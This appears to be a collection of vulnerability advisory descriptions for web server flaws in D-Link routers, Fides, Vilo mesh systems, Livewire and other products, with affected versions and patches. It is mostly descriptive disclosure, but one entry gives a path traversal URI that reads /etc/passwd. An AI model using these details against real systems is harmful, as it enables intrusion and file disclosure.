The Campbell Scientific CSI Web Server supports a command that will return the most recent file that matches a given expression. A specially crafted expression can lead to a path traversal vulnerability. This command combined with a specially crafted expression allows anonymous, unauthenticated access (allowed by default) by an attacker to files and directories outside of the webserver root directory they should be restricted to.
D-Link DIR-3040 prog.cgi websSecurityHandler Memory Leak Denial-of-Service Vulnerability. This vulnerability allows network-adjacent attackers to create a denial-of-service condition on affected installations of D-Link DIR-3040 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the prog.cgi program, which handles HNAP requests made to the lighttpd webserver listening on ports 80 and 443. The issue results from the lack of proper memory management when processing HTTP cookie values. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. . Was ZDI-CAN-21668.
D-Link DIR-2640 HTTP Referer Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640-US routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within prog.cgi, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21853.
CWE-552: Files or Directories Accessible to External Parties vulnerability exists which may prevent user to update the device firmware and prevent proper behavior of the webserver when specific files or directories are removed from the filesystem.
Livewire is a full-stack framework for Laravel that allows for dynamic UI components without leaving PHP. In livewire/livewire prior to `2.12.7` and `v3.5.2`, the file extension of an uploaded file is guessed based on the MIME type. As a result, the actual file extension from the file name is not validated. An attacker can therefore bypass the validation by uploading a file with a valid MIME type (e.g., `image/png`) and a &amp;#8220;.php&amp;#8221; file extension. If the following criteria are met, the attacker can carry out an RCE attack: 1. Filename is composed of the original file name using `$file-&gt;getClientOriginalName()`. 2. Files stored directly on your server in a public storage disk. 3. Webserver is configured to execute &amp;#8220;.php&amp;#8221; files. This issue has been addressed in release versions `2.12.7` and `3.5.2`. All users are advised to upgrade. There are no known workarounds for this vulnerability.
OSS Endpoint Manager is an endpoint manager module for FreePBX. OSS Endpoint Manager module activation can allow authenticated web users unauthorized access to read system files with the permissions of the webserver process. This vulnerability is fixed in 14.0.4.
Fides is an open-source privacy engineering platform. Starting in version 2.19.0 and prior to version 2.44.0, the Email Templating feature uses Jinja2 without proper input sanitization or rendering environment restrictions, allowing for Server-Side Template Injection that grants Remote Code Execution to privileged users. A privileged user refers to an Admin UI user with the default `Owner` or `Contributor` role, who can escalate their access and execute code on the underlying Fides Webserver container where the Jinja template rendering function is executed. The vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no workarounds.
Fides is an open-source privacy engineering platform. Prior to version 2.44.0, a timing-based username enumeration vulnerability exists in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system. This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing. The vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no workarounds.
Filament Excel enables excel export for Filament admin resources. The export download route `/filament-excel/{path}` allowed downloading any file without login when the webserver allows `../` in the URL. Patched with Version v2.3.3.
Homepage is a highly customizable homepage with Docker and service API integrations. The default setup of homepage 0.9.1 is vulnerable to DNS rebinding. Homepage is setup without certificate and authentication by default, leaving it to vulnerable to DNS rebinding. In this attack, an attacker will ask a user to visit his/her website. The attacker website will then change the DNS records of their domain from their IP address to the internal IP address of the homepage instance. To tell which IP addresses are valid, we can rebind a subdomain to each IP address we want to check, and see if there is a response. Once potential candidates have been found, the attacker can launch the attack by reading the response of the webserver after the IP address has changed. When the attacker domain is fetched, the response will be from the homepage instance, not the attacker website, because the IP address has been changed. Due to a lack of authentication, a user&amp;#8217;s private information such as API keys (fixed after first report) and other private information can then be extracted by the attacker website.
Vilo 5 Mesh WiFi System &lt;= 5.16.1.33 lacks authentication in the Boa webserver, which allows remote, unauthenticated attackers to retrieve logs with sensitive system.
Vilo 5 Mesh WiFi System &lt;= 5.16.1.33 is vulnerable to Information Disclosure. An information leak in the Boa webserver allows remote, unauthenticated attackers to leak memory addresses of uClibc and the stack via sending a GET request to the index page.
A Directory Traversal vulnerability in the Boa webserver of Vilo 5 Mesh WiFi System &lt;= 5.16.1.33 allows remote, unauthenticated attackers to enumerate the existence and length of any file in the filesystem by placing malicious payloads in the path of any HTTP request.
A Buffer Overflow in the Boa webserver of Vilo 5 Mesh WiFi System &lt;= 5.16.1.33 allows remote, unauthenticated attackers to execute arbitrary code via exceptionally long HTTP methods or paths.
Fides is an open-source privacy engineering platform. The Fides webserver has a number of endpoints that retrieve `ConnectionConfiguration` records and their associated `secrets` which _can_ contain sensitive data (e.g. passwords, private keys, etc.). These `secrets` are stored encrypted at rest (in the application database), and the associated endpoints are not meant to expose that sensitive data in plaintext to API clients, as it could be compromising. Fides's developers have available to them a Pydantic field-attribute (`sensitive`) that they can annotate as `True` to indicate that a given secret field should not be exposed via the API. The application has an internal function that uses `sensitive` annotations to mask the sensitive fields with a `"**********"` placeholder value. This vulnerability is due to a bug in that function, which prevented `sensitive` API model fields that were _nested_ below the root-level of a `secrets` object from being masked appropriately. Only the `BigQuery` connection configuration secrets meets these criteria: the secrets schema has a nested sensitive `keyfile_creds.private_key` property that is exposed in plaintext via the APIs. Connection types other than `BigQuery` with sensitive fields at the root-level that are not nested are properly masked with the placeholder and are not affected by this vulnerability. This vulnerability has been patched in Fides version 2.37.0. Users are advised to upgrade to this version or later to secure their systems against this threat. Users are also advised to rotate any Google Cloud secrets used for BigQuery integrations in their Fides deployments. There are no known workarounds for this vulnerability.
Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as `@` and `$`, webserver startup fails and the part of the password following the special character is exposed in webserver error logs. This is caused by improper escaping of the SQLAlchemy password string. As a result users are subject to a partial exposure of hosted database password in webserver logs. The vulnerability has been patched in Fides version `2.37.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no known workarounds for this vulnerability.
Fides is an open-source privacy engineering platform, and `SERVER_SIDE_FIDES_API_URL` is a server-side configuration environment variable used by the Fides Privacy Center to communicate with the Fides webserver backend. The value of this variable is a URL which typically includes a private IP address, private domain name, and/or port. A vulnerability present starting in version 2.19.0 and prior to version 2.39.2rc0 allows an unauthenticated attacker to make a HTTP GET request from the Privacy Center that discloses the value of this server-side URL. This could result in disclosure of server-side configuration giving an attacker information on server-side ports, private IP addresses, and/or private domain names. The vulnerability has been patched in Fides version 2.39.2rc0. No known workarounds are available.
INOTEC Sicherheitstechnik WebServer CPS220/64 3.3.19 allows a remote attacker to read arbitrary files via absolute path traversal, such as with the /cgi-bin/display?file=/etc/passwd URI.
EBM Technologies Uniweb/SoliPACS WebServer's query functionality lacks proper restrictions of user input, allowing remote attackers authenticated as regular user to inject SQL commands for reading, modifying, and deleting database records, as well as executing system commands. Attackers may even leverage the dbo privilege in the database for privilege escalation, elevating their privileges to administrator .
The application implements an up- and downvote function which alters a value within a JSON file. The POST parameters are not filtered properly and therefore an arbitrary file can be overwritten. The file can be controlled by an authenticated attacker, the content cannot be controlled. It is possible to overwrite all files for which the webserver has write access. It is required to supply a relative path (path traversal).
Lotos WebServer v0.1.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the response_append_status_line function at /lotos/src/response.c.
LDAP Account Manager (LAM) is a webfrontend for managing entries stored in an LDAP directory. LAM's log configuration allows to specify arbitrary paths for log files. Prior to version 8.7, an attacker could exploit this by creating a PHP file and cause LAM to log some PHP code to this file. When the file is then accessed via web the code would be executed. The issue is mitigated by the following: An attacker needs to know LAM's master configuration password to be able to change the main settings; and the webserver needs write access to a directory that is accessible via web. LAM itself does not provide any such directories. The issue has been fixed in 8.7. As a workaround, limit access to LAM configuration pages to authorized users.
Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled.
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Secomea GateManager (webserver modules) allows crash of GateManager.This issue affects GateManager: from 9.7 before 11.2.624095033.
Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG) vulnerability in Secomea GateManager (Webserver modules) allows Session Hijacking.This issue affects GateManager: before 11.2.624071020.
A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file td.js.gz. The manipulation leads to risky cryptographic algorithm. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been classified as problematic. Affected is an unknown function of the file /InnerRepPlus.html of the component Operator Details Form. The manipulation leads to missing password field masking. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to user input being improperly sanitized.
A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized.
D-Link DIR-X3260 prog.cgi SetUsersSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21675.
D-Link DIR-X3260 prog.cgi SetAPClientSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21673.
D-Link DIR-X3260 prog.cgi SetTriggerPPPoEValidate Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21672.
D-Link DIR-X3260 prog.cgi SetDeviceSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21670.
D-Link DIR-X3260 prog.cgi SetIPv6PppoeSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21669.
D-Link DIR-X3260 prog.cgi SetMyDLinkRegistration Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21667.
D-Link DIR-X3260 prog.cgi SetWLanRadioSecurity Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21595.
D-Link DIR-X3260 prog.cgi SetWanSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21594.
D-Link DIR-X3260 prog.cgi SetSysEmailSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21593.
D-Link DIR-X3260 prog.cgi SetQuickVPNSettings PSK Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21592.
D-Link DIR-X3260 prog.cgi SetQuickVPNSettings Password Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21591.
D-Link DIR-X3260 prog.cgi SetDynamicDNSSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21590.
Cross Site Scripting (XSS) in Voltronic Power SNMP Web Pro v.1.1 allows an attacker to execute arbitrary code via a crafted script within a request to the webserver.
An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides Privacy Center allows data subject users to submit privacy and consent requests to data controller users of the Fides web application. Privacy requests allow data subjects to submit a request to access all person data held by the data controller, or delete/erase it. Consent request allows data subject users to modify their privacy preferences for how the data controller uses their personal data e.g. data sales and sharing consent opt-in/opt-out. If `subject_identity_verification_required` in the `[execution]` section of `fides.toml` or the env var `FIDES__EXECUTION__SUBJECT_IDENTITY_VERIFICATION_REQUIRED` is set to `True` on the fides webserver backend, data subjects are sent a one-time code to their email address or phone number, depending on messaging configuration, and the one-time code must be entered in the Privacy Center UI by the data subject before the privacy or consent request is submitted. It was identified that the one-time code values for these requests were generated by the python `random` module, a cryptographically weak pseduo-random number generator (PNRG). If an attacker generates several hundred consecutive one-time codes, this vulnerability allows the attacker to predict all future one-time code values during the lifetime of the backend python process. There is no security impact on data access requests as the personal data download package is not shared in the Privacy Center itself. However, this vulnerability allows an attacker to (i) submit a verified data erasure request, resulting in deletion of data for the targeted user and (ii) submit a verified consent request, modifying a user's privacy preferences. The vulnerability has been patched in Fides version `2.24.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no known workarounds for this vulnerability.
The web interface of the PAC Device allows the device administrator user profile to store malicious scripts in some fields. The stored malicious script is then executed when the GUI is opened by any users of the webserver administration interface. The root cause of the vulnerability is inadequate input validation and output encoding in the web administration interface component of the firmware. This could lead to unauthorized access and data leakage
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows users to retrieve its configuration using the `GET api/v1/config` endpoint. The configuration data is filtered to suppress most sensitive configuration information before it is returned to the user, but even the filtered data contains information about the internals and the backend infrastructure, such as various settings, servers&amp;#8217; addresses and ports and database username. This information is useful for administrative users as well as attackers, thus it should not be revealed to low-privileged users. This vulnerability allows Admin UI users with roles lower than the owner role e.g. the viewer role to retrieve the config information using the API. The vulnerability has been patched in Fides version `2.22.1`.
D-Link DIR-X3260 SetSysEmailSettings SMTPServerAddress Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within prog.cgi, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21222.
D-Link DIR-X3260 SetSysEmailSettings AccountPassword Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within prog.cgi, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21160.
D-Link DIR-X3260 SetSysEmailSettings AccountName Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within prog.cgi, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21159.
D-Link DIR-X3260 SetSysEmailSettings EmailTo Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within prog.cgi, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21158.
D-Link DIR-X3260 SetTriggerPPPoEValidate Password Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the prog.cgi program, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21157.
D-Link DIR-X3260 SetSysEmailSettings EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the prog.cgi program, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21102.
D-Link DIR-X3260 SetTriggerPPPoEValidate Username Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the prog.cgi program, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21101.
D-Link DIR-X3260 Prog.cgi Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver. The issue results from the lack of proper validation of the length an user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20774.
D-Link DIR-X3260 Prog.cgi Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver. The issue results from the lack of proper validation of the length an user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20727.
The webserver utilizes basic authentication for its user login to the configuration interface. As encryption is disabled on port 80, it enables potential eavesdropping on user traffic, making it possible to intercept their credentials.
A 'Cross-site Scripting' (XSS) vulnerability, characterized by improper input neutralization during web page generation, has been discovered. This vulnerability allows for Stored XSS attacks to occur. Multiple areas within the administration interface of the webserver lack adequate input validation, resulting in multiple instances of Stored XSS vulnerabilities.
Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows custom integrations to be uploaded as a ZIP file. This ZIP file must contain YAML files, but Fides can be configured to also accept the inclusion of custom Python code in it. The custom code is executed in a restricted, sandboxed environment, but the sandbox can be bypassed to execute any arbitrary code. The vulnerability allows the execution of arbitrary code on the target system within the context of the webserver python process owner on the webserver container, which by default is `root`, and leverage that access to attack underlying infrastructure and integrated systems. This vulnerability affects Fides versions `2.11.0` through `2.19.0`. Exploitation is limited to API clients with the `CONNECTOR_TEMPLATE_REGISTER` authorization scope. In the Fides Admin UI this scope is restricted to highly privileged users, specifically root users and users with the owner role. Exploitation is only possible if the security configuration parameter `allow_custom_connector_functions` is enabled by the user deploying the Fides webserver container, either in `fides.toml` or by setting the env var `FIDES__SECURITY__ALLOW_CUSTOM_CONNECTOR_FUNCTIONS=True`. By default this configuration parameter is disabled. The vulnerability has been patched in Fides version `2.19.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. Users unable to upgrade should ensure that `allow_custom_connector_functions` in `fides.toml` and the `FIDES__SECURITY__ALLOW_CUSTOM_CONNECTOR_FUNCTIONS` are both either unset or explicit set to `False`.
D-Link DIR-3040 HTTP Request Processing Referer Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21674.
D-Link DIR-3040 HTTP Request Processing Referer Heap-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21671.
D-Link DIR-3040 prog.cgi SetUsersSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21654.
D-Link DIR-3040 prog.cgi SetTriggerPPPoEValidate Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21653.
D-Link DIR-3040 prog.cgi SetMyDLinkRegistration Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21652.
D-Link DIR-3040 prog.cgi SetIPv6PppoeSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21651.
D-Link DIR-3040 prog.cgi SetDeviceSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21650.
D-Link DIR-3040 prog.cgi SetQuickVPNSettings PSK Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21623.
D-Link DIR-3040 prog.cgi SetWan2Settings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21622.
D-Link DIR-3040 prog.cgi SetWLanRadioSecurity Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21621.
D-Link DIR-3040 prog.cgi SetSysEmailSettings Stack-Based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-3040 routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21620.
